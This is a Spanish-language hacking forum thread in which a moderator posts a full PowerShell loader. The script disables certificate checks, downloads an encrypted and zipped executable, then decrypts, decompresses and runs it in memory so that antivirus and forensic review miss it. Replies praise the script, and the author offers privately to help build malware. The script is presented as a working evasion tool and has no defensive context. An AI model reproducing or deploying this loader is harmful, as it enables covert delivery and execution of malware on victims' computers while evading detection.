[POWERSHELL] Download, Decypher, UnZip and Execute en memoria, no quedan rastros

  • 5 Respuestas
  • 2443 Vistas

0 Usuarios y 4 Visitantes están viendo este tema.

Desconectado 79137913

  • *
  • Moderator
  • Mensajes: 712
  • Actividad:
    6.67%
  • Country: 00
  • Reputación 7913
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
HOLA!!!

Se me ocurrio el otro dia ponerme a armar un script que permita hacer una ejecucion en memoria sin dejar rastros para forenses despues de la ejecucion de nuestro script, luego pasaron cosas y decidi agregarle que el ejecutable descargado se descifre para que el AV no pueda detectar la descarga y para ultima seguridad el ejecutable aparte de estar cifrado estaria zipeado. Asique como imaginaran esto es un incordio para que cualquier AV lo detecte on the fly, y como se ejecuta en memoria solo tenemos que cuidar la heuristica en ejecucion de lo que descarguemos y va a funcionar sin problemas.

Sin mas, al codigo:
Código: You are not allowed to view links. Register or Login
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

$wc = New-Object -TypeName System.Net.WebClient

$wc.Headers.Add(“Accept-Language”, “en-US,en;q=0.” + ([IntPtr]::Size – 1).ToString())

$wc.Headers.Add(“User-Agent”, “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)”)

$rndn = Get-Random

$wc.Headers.Add(“Cookie”, “p=” + $rndn)

$data = $wc.DownloadData(“[URL AL PROGRAMA]”)

#PARAMETROS PARA EJECUTAR (OPCIONAL)
[string[]]$xags = “/s”, “[SERVER]”, “/p”, “[PORT]”

#INICIO DE PROCESO DE DESCIFRADO (OPCIONAL)
$Passphrase = “[CLAVE CIFRADO]”

$salts = “[SALT]”

$r = new-Object System.Security.Cryptography.RijndaelManaged

$pass = [System.Text.Encoding]::UTF8.GetBytes($Passphrase)

$salt = [System.Text.Encoding]::UTF8.GetBytes($salts)

 

$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, “SHA1″, 5).GetBytes(32) #256/8

$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($rndn) )[0..15]

 

$d = $r.CreateDecryptor()

$ms = new-Object IO.MemoryStream @(,$data)

$cs = new-Object Security.Cryptography.CryptoStream $ms,$d,”Read”
#FIN DE PROCESO DE DESCIFRADO (OPCIONAL)

#DESCOMPRESION (OPCIONAL)
$dfs = New-Object System.IO.Compression.GzipStream $cs, ([IO.Compression.CompressionMode]::Decompress)

$msout = New-Object System.IO.MemoryStream

[byte[]]$buffer = new-object byte[] 4096

[int]$count = 0

do

{

$count = $dfs.Read($buffer, 0, $buffer.Length)

$msout.Write($buffer, 0, $count)

} while ($count -gt 0)

 

$dfs.Close()

$cs.Close()

$ms.Close()

$r.Clear()

 

[byte[]]$bin = $msout.ToArray()

$al = New-Object -TypeName System.Collections.ArrayList

#AGREGAR PARAMETROS AL EJECUTABLE (OPCIONAL)
$al.Add($xags) 

$asm = [System.Reflection.Assembly]::Load($bin)

$asm.EntryPoint.Invoke($null, $al.ToArray())

sleep 5

Exit

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   You are not allowed to view links. Register or Login

Desconectado AXCESS

  • *
  • Moderador Global
  • Mensajes: 1413
  • Actividad:
    100%
  • Country: 00
  • Reputación 23
    • Ver Perfil
    • Email
Calificarse puede con adjetivo superlativo: buenísimo.
Su divulgación y uso pudiera ser peligroso; pero… peligrosos somos  y entre gatos andamos; o no?

Muy bueno (lo mejorcito que he visto). Es Ud. realmente ingenioso y creativo.

Pena grande que no tenga inclinación por ensamblar malware.
Pero… quién sabe

You are not allowed to view links. Register or Login   ;)
« Última modificación: Septiembre 25, 2021, 12:37:41 am por AXCESS »
You are not allowed to view links. Register or Login

Desconectado DtxdF

  • *
  • Moderador Global
  • Mensajes: 1011
  • Actividad:
    83.33%
  • Country: 00
  • Reputación 24
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email
@AXCESS

Está buenísimo, con eso derrocamos a la caniche y servidores...

@79137913

No hay que decir mucho: como siempre brutal leer estas joyas.

+1

~ DtxdF
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado ZarathuxXxtrA

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    3.33%
  • Country: ar
  • Reputación 0
  • ZarathuxXxtra :: Yukah Nahan
    • Ver Perfil
    • Underc0de
Nooo!! Impresionante, me lo llevo... +1 Gracias por compartirlo @79137913, terrible script!
You are not allowed to view links. Register or Login
Lo abstracto. El elemento sin el cual, no existiría el camino del guerrero, ni guerrero alguno en busca de Conocimiento.

Desconectado 79137913

  • *
  • Moderator
  • Mensajes: 712
  • Actividad:
    6.67%
  • Country: 00
  • Reputación 7913
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
HOLA!!!

You are not allowed to view links. Register or Login
Pena grande que no tenga inclinación por ensamblar malware.
Pero… quién sabe

Quien dijo que no tengo inclinacion a ensamblar malware? Lo he hecho toda mi vida, si queres armar algo avisame al privado!

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                   You are not allowed to view links. Register or Login

Desconectado AXCESS

  • *
  • Moderador Global
  • Mensajes: 1413
  • Actividad:
    100%
  • Country: 00
  • Reputación 23
    • Ver Perfil
    • Email
JAJAJA!!

Me refería a mí, que no soy dado a ensamblar malware. Mire el meme del gato.

Muchas gracias por el ofrecimiento, lo tendré presente.






You are not allowed to view links. Register or Login